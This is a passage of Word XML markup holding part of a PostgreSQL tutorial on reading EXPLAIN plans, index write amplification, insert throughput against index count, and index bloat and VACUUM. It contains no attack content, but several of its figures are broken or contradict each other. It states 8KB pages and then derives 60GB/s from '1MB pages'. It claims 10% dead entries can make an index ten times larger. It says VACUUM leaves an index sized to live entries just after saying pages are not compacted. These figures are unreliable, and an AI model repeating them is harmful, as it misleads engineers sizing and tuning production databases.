        <w:t xml:space="preserve">                       (actual time=87.123..88.965 rows=25000 loops=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C593A66" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">          -&gt;  Hash Join  (cost=4234.12..10853.23 rows=200000 width=12) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56220DA1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                         (actual time=32.456..71.234 rows=180000 loops=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371CAA1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                Hash Cond: (o.customer_id = u.id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7766F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                Buffers: shared hit=8234 read=2891</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B601E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            -&gt;  Seq Scan on orders o  (cost=0..5234.12 rows=200000 width=8) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B73AB40" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                                      (actual time=0.032..28.432 rows=200000 loops=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D6FCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                    Buffers: shared hit=3234 read=1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36ABC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            -&gt;  Hash  (cost=3984.12..3984.12 rows=20000 width=12) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E68630E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                      (actual time=28.432..28.432 rows=20000 loops=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ACFCA9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                  -&gt;  Index Scan using users_created_at_idx on users u  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58659A83" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                      (cost=0.43..3984.12 rows=20000 width=12) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5797E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                      (actual time=0.089..21.234 rows=20000 loops=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A72B1D0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                        Index Cond: (created_at &gt; '2023-01-01')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C46A3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                        Buffers: shared hit=5000 read=1657</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CEBF66" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reading the EXPLAIN output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169159EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61331FC7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Key metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0156FC5C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  cost=start..total: estimated cost (in abstract cost units)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C162A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    start cost: cost before first row is returned (setup cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8AFA57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    total cost: cost for all rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B2999B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BBB121" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  rows=N: estimated number of rows output by this node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20870AAB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  actual time=start..total: actual milliseconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B10721" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  loops=N: how many times this node executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6B61FD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B216A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Buffers: shared hit=N read=M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095DDF0A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    hit: pages served from PostgreSQL buffer pool (RAM) — fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71423C1A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    read: pages read from disk — slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15089780" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    hit/(hit+read) = buffer pool hit rate for this query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A8CC44" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B0FA1C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Analysis of the example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B77E0DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index Scan on users: good — using the index, 1657 disk reads for 20,000 rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA25D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Seq Scan on orders: 200,000 rows, no index used — was full scan justified?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778ACC12" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Check: 200,000 rows / total_orders × 100% selectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C3D15E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If orders has 300,000 rows, 67% selectivity → seq scan is correct choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D43BC51" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If orders has 10,000,000 rows, 2% selectivity → seq scan is wrong, missing index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C5FF8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A8031" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Estimated vs actual: estimated 20,000 rows for HashAggregate, got 25,000 (25% error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB49C23" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Minor discrepancy — acceptable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6B75F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Large discrepancies (10×, 100×) indicate stale statistics → run ANALYZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E456405" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="483A7CDF">
          <v:rect id="_x0000_i5428" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="271AE99C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Index Maintenance — The Operational Reality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80DEB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Write Amplification and Index Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EBD7AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The true cost of indexes on write throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BE34EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46017EEE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>INSERT INTO orders(customer_id, product_id, amount, status, created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F3C97" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>VALUES (123, 456, 99.99, 'pending', NOW());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40743550" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="452E0A57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>With 5 indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F8200" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Write heap page (the actual row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3AFE0A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Update primary key index (B-Tree leaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65307669" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Update customer_id index (B-Tree leaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B7D81" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  4. Update status index (B-Tree leaf) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A6BCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  5. Update created_at index (B-Tree leaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1631D9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  6. Update (customer_id, created_at) composite index (B-Tree leaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20832947" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D33B4B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Each index update:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C96966B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Read leaf page (likely in buffer pool, but may require disk read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18156F79" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Modify in memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09623E51" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Write modified page to WAL (sequential write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD563C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Mark page as dirty (will be flushed to disk by checkpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E20719" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3738F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Possible additional writes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0491A212" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    B-Tree splits if any leaf page is full (O(height) additional writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62033885" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Parent page updates for each split</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C380F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F66F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write amplification: 6× (6 physical writes for 1 logical write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BD4766" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  At 10,000 inserts/second: 60,000 page writes/second just for indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F690D10" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  At 1MB pages flushed from buffer pool: 60GB/s write bandwidth requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C270624" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The index count vs write performance trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40235910" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C8751" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Benchmark: INSERT throughput vs number of indexes (representative results):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7FF35D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  0 indexes: 100,000 rows/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7EE75" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1 index:    85,000 rows/second (15% overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73D6C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3 indexes:  65,000 rows/second (35% overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03031C5C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  5 indexes:  45,000 rows/second (55% overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2963B257" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  10 indexes: 25,000 rows/second (75% overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD80EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31082CB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The relationship is approximately linear: each index adds ~7-10% overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A72A17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For write-heavy tables: keep indexes minimal, add only for queries that need them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25067924" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bloat — The Silent Performance Killer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04622A2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What index bloat is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F8E0DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>B-Tree pages that have been partially emptied by deletes and updates are not immediately reclaimed. A page with 100 entries that has 80 deletes now has 20 entries using a full 8KB page — 80% of the page is wasted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD7099A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46981CD5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Table: 10M rows, 1M recently deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496E095" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Without vacuuming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B329FBA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index still contains 10M leaf entries (including 1M dead entries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026761E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Dead entries consume space, slow index scans, require more page reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E24AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index size may be 10× larger than necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E220180" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="69A060B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>After VACUUM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA544C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Dead index entries removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4970B3F6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Pages reclaimed (partially — PostgreSQL marks pages as available but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4C1BB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    doesn't necessarily return pages to OS or compact them)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878E2D9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index size reflects only live entries</w:t>
      </w:r>
    </w:p>
